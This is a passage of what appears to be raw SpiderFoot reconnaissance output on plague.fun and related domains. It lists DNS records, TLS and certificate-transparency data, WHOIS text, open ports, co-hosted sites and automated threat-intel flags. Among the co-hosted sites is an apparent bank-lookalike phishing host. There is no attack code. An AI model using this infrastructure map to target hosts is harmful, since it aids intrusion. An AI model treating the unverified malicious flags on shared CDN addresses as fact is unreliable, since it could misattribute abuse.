"2022-12-11T12:15:23.828613355Z"}, "halawipga.tk": {"record_type": "A", "resolved_at": "2022-12-09T01:28:34.969228948Z"}, "forgetfulcorn.xyz": {"record_type": "A", "resolved_at": "2022-12-16T16:53:12.007013166Z"}, "www.thedollhousemuseum.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-10-31T16:19:02.095549627Z"}, "www.makecoloradohome.com": {"record_type": "A", "resolved_at": "2022-12-13T13:44:08.455137791Z"}, "promo-pancake.com": {"record_type": "A", "resolved_at": "2022-12-13T14:01:44.599052096Z"}, "mail.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-11-18T12:15:11.721015572Z"}, "propdifportfidolo.ml": {"record_type": "A", "resolved_at": "2022-12-11T15:21:35.046116976Z"}, "cpanel.upzmujahidinkalbar.com": {"record_type": "A", "resolved_at": "2022-12-14T14:33:07.049345906Z"}, "guelobasagtoppco.tk": {"record_type": "A", "resolved_at": "2022-12-13T17:52:25.676431188Z"}, "fancyacake.net": {"record_type": "A", "resolved_at": "2022-11-30T15:56:40.221799680Z"}, "artopicolma.tk": {"record_type": "A", "resolved_at": "2022-11-19T16:34:56.998683369Z"}, "mindyourbusiness-india.com": {"record_type": "A", "resolved_at": "2022-12-13T13:45:57.533540990Z"}}, "names": ["johnparkeraesthetics.com", "mail.theerathornnft.com", "artopicolma.tk", "tilburg-zonnepaneel.nl", "mulsoftbobarepterp.ga", "www.hookup.directory", "cpcontacts.sectraexpress.com", "mail.batonrougekennelclub.com", "tiaronamescio.tk", "wrisinukilor.tk", "backronseri.gq", "batonrougekennelclub.com", "cpanel.protipsnetbd.com", "deedattractiveauthority.quest", "solidnmr.hu", "fatosbrasil.com.br", "beeorganic.us", "gaseabenzla 104.21.28.240 2022-12-18 00:06:14 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.com plague.fun 2022-12-18 00:05:59 Affiliate - Domain Name No DNS Resolver 2 0 2 0 None registrar-servers.com eforward3.registrar-servers.com 2022-12-18 00:04:00 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:5f:2b:c4:e2:52:ac:ba:5b:55:25:2b:3c:57:78:0c:6b:4f Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Apr 9 16:42:21 2022 GMT Not After : Jul 8 16:42:20 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:f0:74:08:94:b1:0e:3a:f5:ab:5d:27:9f:a1:13: 26:4a:b8:88:b4:cd:16:65:28:29:5d:0c:65:22:96: 16:e9:20:24:42:3d:6d:35:0e:c1:28:8c:4a:28:75: c3:5b:63:81:00:5f:79:35:b2:8c:de:87:22:b0:ad: a6:67:62:40:d8:17:58:b3:75:0e:b6:2f:73:f2:ea: eb:e0:8f:76:26:50:9a:16:11:75:b8:95:2c:97:e5: b9:e5:63:e7:51:d3:eb:e7:99:34:6a:cf:cc:fb:cf: db:aa:47:5b:d5:56:1a:8d:93:2c:fd:ff:26:75:37: d0:62:e4:63:b7:38:a8:b2:e3:d7:82:92:52:ce:b0: af:e9:42:c7:ca:4f:21:55:20:92:35:54:9c:65:7a: ce:69:96:a3:18:10:90:ac:b1:94:6c:06:cb:1d:e6: f3:8c:63:be:4d:c3:b6:5c:e7:73:eb:aa:34:c4:16: b2:55:9f:e1:5e:c9:6e:3c:a6:a1:4e:ce:ba:1c:93: 9b:8f:97:87:77:b0:cc:86:0e:ec:a3:31:e9:6a:17: 0a:2c:ea:72:83:72:e9:ad:a4:a9:77:f3:4c:21:11: 4e:be:f0:d4:f6:9c:70:8a:00:15:78:65:11:81:45: 14:10:49:bf:49:44:94:90:4c:18:e2:6e:b5:c1:88: 5e:37 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: C9:18:99:93:EB:0E:8F:DB:EF:08:28:03:69:26:F5:7B:25:61:0A:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Apr 9 17:42:21.761 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:76:D4:69:CE:F9:0F:01:E4:95:EB:BC:82: 9C:5E:88:B8:ED:FE:41:18:8A:01:61:3E:CD:29:3B:0B: CE:AB:C1:1C:02:21:00:A5:D9:95:92:02:A2:E8:78:BF: E9:DB:44:85:3B:68:75:11:46:F4:79:52:2F:06:17:34: 06:55:9D:42:97:60:03 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Apr 9 17:42:21.790 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:8A:28:8A:24:C8:BF:19:90:79:23:43: 21:42:28:0E:AA:BD:D4:96:F1:31:B9:93:FE:C4:6C:5F: F8:49:D9:FE:BF:02:20:6C:E0:5C:5A:F7:9E:25:F9:0E: 56:F8:91:1A:D1:91:FC:A4:00:3A:35:A2:A0:19:F1:A3: AC:69:A7:28:55:78:CE Signature Algorithm: sha256WithRSAEncryption 35:a5:60:e7:22:70:b0:5b:b5:cc:ec:24:6b:fe:a4:b2:b5:d3: 63:87:fc:e1:06:d4:1c:7a:27:66:95:0b:3b:f3:57:c2:47:2e: 0f:bf:2f:47:45:73:38:b4:cf:35:10:df:13:b2:73:e3:5f:17: 1c:d2:43:47:36:d4:6f:4a:b3:42:ed:98:0f:cc:f8:88:ab:f9: 42:42:17:25:8b:39:55:d4:b8:65:63:af:0d:c1:cd:ba:03:81: 81:9e:3c:10:74:65:96:bf:49:2e:75:08:73:44:11:71:54:ff: e8:a4:14:75:7e:37:93:35:7c:5f:07:89:38:3a:c0:4d:37:c3: 39:7b:81:58:97:b7:35:c5:82:6a:0c:99:e8:22:9c:ed:83:3a: 1d:49:2c:1c:9e:56:d5:a3:58:a8:7b:35:e5:27:1b:7a:f3:e2: ca:ff:c2:4e:75:39:9b:36:cd:41:f0:62:d4:27:fc:da:09:3f: fd:4f:c7:98:56:15:c7:60:05:46:59:83:b5:b5:02:66:02:02: 13:75:ac:4b:72:b7:6d:d3:1f:99:78:97:71:3b:f3:8e:07:0b: 82:62:af:3e:67:22:bb:e1:d4:ae:c5:9f:42:ea:98:db:f3:7b: bf:ec:79:68:9a:3a:63:c0:db:58:45:c2:32:72:92:1f:69:2e: 35:6d:26:f6 plague.fun 2022-12-18 00:02:39 Internet Name No SpiderFoot UI 147 0 0 0 None plague.fun plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:03:14 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-99.w90-116.abo.wanadoo.fr 90.116.166.99 2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None sni.cloudflaressl.com 188.114.96.9 2022-12-18 00:10:04 Internet Name - Unresolved No URLScan.io 0 0 1 0 None obf.plague.fun plague.fun 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77b25d2e9a19226e-ORD"]} 188.114.96.0 2022-12-18 00:25:00 Physical Location No MetaDefender 0 0 1 0 None Amsterdam, Netherlands 40.113.112.131 2022-12-18 00:22:01 Netblock IPv6 Membership No Censys 0 0 2 0 None 2a06:98c1:3121::/48 2a06:98c1:3121::1 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.169.215 2022-12-18 00:09:24 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.7:8443 188.114.96.0/24 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 18c34ac2-fa7a-4b78-b7ff-ef204b07e192.id.repl.co 34.149.204.188 2022-12-18 00:02:49 Raw Data from RIRs No Certificate Transparency 6 0 1 0 None [{u'not_after': u'2023-02-02T13:11:40', u'not_before': u'2022-11-04T13:11:41', u'issuer_ca_id': 183267, u'name_value': u'atlas.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'atlas.plague.fun', u'serial_number': u'03f84007a92a29fa95e25feaf2e97579578e', u'entry_timestamp': u'2022-11-04T14:11:41.749', u'id': 7901805042}, {u'not_after': u'2023-02-02T13:11:40', u'not_before': u'2022-11-04T13:11:41', u'issuer_ca_id': 183267, u'name_value': u'atlas.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'atlas.plague.fun', u'serial_number': u'03f84007a92a29fa95e25feaf2e97579578e', u'entry_timestamp': u'2022-11-04T14:11:41.192', u'id': 7901776752}, {u'not_after': u'2023-01-28T20:43:45', u'not_before': u'2022-10-30T20:43:46', u'issuer_ca_id': 180753, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.plague.fun', u'serial_number': u'482040e9116c46fc13c8c69195a6d19b', u'entry_timestamp': u'2022-10-30T21:43:47.002', u'id': 7867480275}, {u'not_after': u'2023-01-28T18:19:30', u'not_before': u'2022-10-30T18:19:31', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'046bc55a1caade11253a85ac2746ac84c2a9', u'entry_timestamp': u'2022-10-30T19:19:32.251', u'id': 7866911231}, {u'not_after': u'2023-01-28T18:19:30', u'not_before': u'2022-10-30T18:19:31', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'046bc55a1caade11253a85ac2746ac84c2a9', u'entry_timestamp': u'2022-10-30T19:19:31.817', u'id': 7866912127}, {u'not_after': u'2023-01-21T15:38:17', u'not_before': u'2022-10-23T15:38:18', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'04d0d1a1cc7c20edeb01fc85dd45cce51bda', u'entry_timestamp': u'2022-10-23T16:38:19.446', u'id': 7820445958}, {u'not_after': u'2023-01-21T15:38:17', u'not_before': u'2022-10-23T15:38:18', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'04d0d1a1cc7c20edeb01fc85dd45cce51bda', u'entry_timestamp': u'2022-10-23T16:38:18.729', u'id': 7814082976}, {u'not_after': u'2023-01-04T20:16:47', u'not_before': u'2022-10-06T20:16:48', u'issuer_ca_id': 183267, u'name_value': u'hook.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'hook.plague.fun', u'serial_number': u'0443a47d291f150e6bac86e44bc0be6971a9', u'entry_timestamp': u'2022-10-06T21:16:48.99', u'id': 7712078353}, {u'not_after': u'2023-01-04T20:16:47', u'not_before': u'2022-10-06T20:16:48', u'issuer_ca_id': 183267, u'name_value': u'hook.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'hook.plague.fun', u'serial_number': u'0443a47d291f150e6bac86e44bc0be6971a9', u'entry_timestamp': u'2022-10-06T21:16:48.471', u'id': 7688527736}, {u'not_after': u'2022-11-30T20:47:44', u'not_before': u'2022-09-01T20:47:45', u'issuer_ca_id': 180753, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.plague.fun', u'serial_number': u'00e5465ab1fb4713cc0e4e814549c868c3', u'entry_timestamp': u'2022-09-01T21:47:46.013', u'id': 7454625821}, {u'not_after': u'2022-11-30T17:51:41', u'not_before': u'2022-09-01T17:51:42', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0308aa47534059b8a396dc9687a97a35d608', u'entry_timestamp': u'2022-09-01T18:51:42.953', u'id': 7453781460}, {u'not_after': u'2022-11-30T17:51:41', u'not_before': u'2022-09-01T17:51:42', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0308aa47534059b8a396dc9687a97a35d608', u'entry_timestamp': u'2022-09-01T18:51:42.314', u'id': 7453781860}, {u'not_after': u'2022-11-22T16:36:09', u'not_before': u'2022-08-24T16:36:10', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'03b5eeaa9fa9bb8686d85d7ec771cb57b527', u'entry_timestamp': u'2022-08-24T17:36:10.582', u'id': 7401145896}, {u'not_after': u'2022-11-22T16:36:09', u'not_before': u'2022-08-24T16:36:10', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'03b5eeaa9fa9bb8686d85d7ec771cb57b527', u'entry_timestamp': u'2022-08-24T17:36:10.4', u'id': 7401140134}, {u'not_after': u'2022-10-02T17:47:43', u'not_before': u'2022-07-04T17:47:44', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'04a499c76ccb8c6087124dac6daabc484646', u'entry_timestamp': u'2022-07-04T18:47:45.339', u'id': 7063588708}, {u'not_after': u'2022-10-02T17:47:43', u'not_before': u'2022-07-04T17:47:44', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'04a499c76ccb8c6087124dac6daabc484646', u'entry_timestamp': u'2022-07-04T18:47:45.085', u'id': 7060149773}, {u'not_after': u'2022-09-23T16:58:01', u'not_before': u'2022-06-25T16:58:02', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'042f49079093a806e6050c264050ef77d782', u'entry_timestamp': u'2022-06-25T17:58:03.347', u'id': 7007138023}, {u'not_after': u'2022-09-23T16:58:01', u'not_before': u'2022-06-25T16:58:02', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'042f49079093a806e6050c264050ef77d782', u'entry_timestamp': u'2022-06-25T17:58:02.892', u'id': 7004980687}, {u'not_after': u'2022-09-23T00:45:17', u'not_before': u'2022-06-25T00:45:18', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'030562a32a566ad6e7de855f24eefdd09c8a', u'entry_timestamp': u'2022-06-25T01:45:18.88', u'id': 7003478081}, {u'not_after': u'2022-09-23T00:45:17', u'not_before': u'2022-06-25T00:45:18', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'030562a32a566ad6e7de855f24eefdd09c8a', u'entry_timestamp': u'2022-06-25T01:45:18.601', u'id': 7001093209}, {u'not_after': u'2022-08-04T17:46:03', u'not_before': u'2022-05-06T17:46:04', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'03d81f4b915bd7bf2fbe6e278c6c60f68680', u'entry_timestamp': u'2022-05-06T18:46:04.241', u'id': 6677170444}, {u'not_after': u'2022-08-04T17:46:03', u'not_before': u'2022-05-06T17:46:04', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'03d81f4b915bd7bf2fbe6e278c6c60f68680', u'entry_timestamp': u'2022-05-06T18:46:04.096', u'id': 6677169275}, {u'not_after': u'2022-07-08T16:42:20', u'not_before': u'2022-04-09T16:42:21', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'035f2bc4e252acba5b55252b3c57780c6b4f', u'entry_timestamp': u'2022-04-09T17:42:21.905', u'id': 6510705122}, {u'not_after': u'2022-07-08T16:42:20', u'not_before': u'2022-04-09T16:42:21', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'035f2bc4e252acba5b55252b3c57780c6b4f', u'entry_timestamp': u'2022-04-09T17:42:21.739', u'id': 6510705589}, {u'not_after': u'2022-06-06T17:41:56', u'not_before': u'2022-03-08T17:41:57', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:58.165', u'id': 6305472947}, {u'not_after': u'2022-06-06T17:41:56', u'not_before': u'2022-03-08T17:41:57', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:57.451', u'id': 6305474316}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:28.385', u'id': 6305464280}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:27.978', u'id': 6305463915}, {u'not_after': u'2022-04-08T17:50:29', u'not_before': u'2022-01-08T17:50:30', u'issuer_ca_id': 183267, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.plague.fun', u'serial_number': u'045042ff9a7a0aecdb51557918dd8fed52b0', u'entry_timestamp': u'2022-01 plague.fun 2022-12-18 00:13:48 Web Content Language No Language Detector 0 0 3 0 None English 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

2022-12-18 00:09:42 Co-Hosted Site No HackerTarget 0 0 2 0 None aiiasp.com 172.67.147.230 2022-12-18 00:21:51 Open TCP Port No Censys 0 0 2 0 None 172.67.137.37:2095 172.67.137.37 2022-12-18 00:08:59 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.97.0 2022-12-18 00:32:06 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.software plague.fun 2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None autoconceitoveiculos.com.br 172.67.147.230 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2053 104.21.19.243 2022-12-18 00:24:02 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: PLAGUE.NET Registry Domain ID: 33118110_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.PublicDomainRegistry.com Registrar URL: http://www.publicdomainregistry.com Updated Date: 2022-09-03T19:07:29Z Creation Date: 2000-08-17T10:30:29Z Registry Expiry Date: 2023-08-17T10:30:29Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: BIZ.THOROFARE.INFO Name Server: INFO.THOROFARE.BIZ DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:23:45Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: PLAGUE.NET Registry Domain ID: 33118110_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2022-09-03T19:07:30Z Creation Date: 2000-08-17T10:30:29Z Registrar Registration Expiration Date: 2023-08-17T10:30:29Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: GDPR Masked Registrant Name: GDPR Masked Registrant Organization: GDPR Masked Registrant Street: GDPR Masked Registrant City: GDPR Masked Registrant State/Province: London Registrant Postal Code: GDPR Masked Registrant Country: GB Registrant Phone: GDPR Masked Registrant Phone Ext: Registrant Fax: GDPR Masked Registrant Fax Ext: Registrant Email: gdpr-masking@gdpr-masked.com Registry Admin ID: GDPR Masked Admin Name: GDPR Masked Admin Organization: GDPR Masked Admin Street: GDPR Masked Admin City: GDPR Masked Admin State/Province: GDPR Masked Admin Postal Code: GDPR Masked Admin Country: GDPR Masked Admin Phone: GDPR Masked Admin Phone Ext: Admin Fax: GDPR Masked Admin Fax Ext: Admin Email: gdpr-masking@gdpr-masked.com Registry Tech ID: GDPR Masked Tech Name: GDPR Masked Tech Organization: GDPR Masked Tech Street: GDPR Masked Tech City: GDPR Masked Tech State/Province: GDPR Masked Tech Postal Code: GDPR Masked Tech Country: GDPR Masked Tech Phone: GDPR Masked Tech Phone Ext: Tech Fax: GDPR Masked Tech Fax Ext: Tech Email: gdpr-masking@gdpr-masked.com Name Server: biz.thorofare.info Name Server: info.thorofare.biz DNSSEC: Unsigned Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:24:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp Registration Service Provided By: The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is", and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. The Registrar of record is PDR Ltd. d/b/a PublicDomainRegistry.com. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. plague.net 2022-12-18 00:06:04 Affiliate - Domain Name No DNS Resolver 2 0 2 0 None cloudflare.com garrett.ns.cloudflare.com 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 64 0 1 0 None 172.67.190.129 plague.fun 2022-12-18 00:04:30 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None mail-fr.securemail.pro zerotwo-best-waifu.online 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None serviciosbancpichinchacomecu.ecuador0.repl.co 34.149.204.188 2022-12-18 00:03:07 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.187 34.149.204.188 2022-12-18 00:18:28 Affiliate - Domain Name No DNS Resolver 2 0 3 0 None setupdns.net webmail-fr.setupdns.net 2022-12-18 00:10:04 Raw Data from RIRs No URLScan.io 0 0 1 0 None [{u'sort': [1666956116154, u'38aa66fb-392e-4d9e-b65f-c673218e73c9'], u'task': {u'domain': u'rasputain.fr', u'uuid': u'38aa66fb-392e-4d9e-b65f-c673218e73c9', u'url': u'http://rasputain.fr/', u'visibility': u'public', u'time': u'2022-10-28T11:21:56.154Z', u'apexDomain': u'rasputain.fr', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 180, u'requests': 1, u'dataLength': 27}, u'screenshot': u'https://urlscan.io/screenshots/38aa66fb-392e-4d9e-b65f-c673218e73c9.png', u'result': u'https://urlscan.io/api/v1/result/38aa66fb-392e-4d9e-b65f-c673218e73c9/', u'_id': u'38aa66fb-392e-4d9e-b65f-c673218e73c9', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'rasputain.fr', u'url': u'http://rasputain.fr/', u'ip': u'90.116.166.104', u'asnname': u'France Telecom - Orange, FR', u'server': u'Werkzeug/2.0.3 Python/3.9.0', u'country': u'FR', u'ptr': u'lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr', u'apexDomain': u'rasputain.fr', u'asn': u'AS3215'}}] rasputain.fr 2022-12-18 00:14:29 Malicious IP Address Yes Internet Storm Center 0 1 2 0 None Internet Storm Center [188.114.96.3] https://isc.sans.edu/api/ip/188.114.96.3 188.114.96.3 2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 104.21.7.179:2052 104.21.7.179 2022-12-18 00:21:58 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-16T03:45:34.561Z", "ip": "2a06:98c1:3120::1", "location_updated_at": "2022-12-06T04:37:36.513741Z", "autonomous_system_updated_at": "2022-12-06T04:37:36.676551Z", "location": {"country": "United States", "coordinates": {"latitude": 37.751, "longitude": -97.822}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"uncoveryourconfidence.org": {"record_type": "AAAA", "resolved_at": "2022-11-23T20:29:39.482548225Z"}, "www.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-09-25T19:02:08.754559807Z"}, "beautybeyondhair.net": {"record_type": "AAAA", "resolved_at": "2022-11-30T15:41:49.088773411Z"}, "wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "www.wolny.poker": {"record_type": "AAAA", 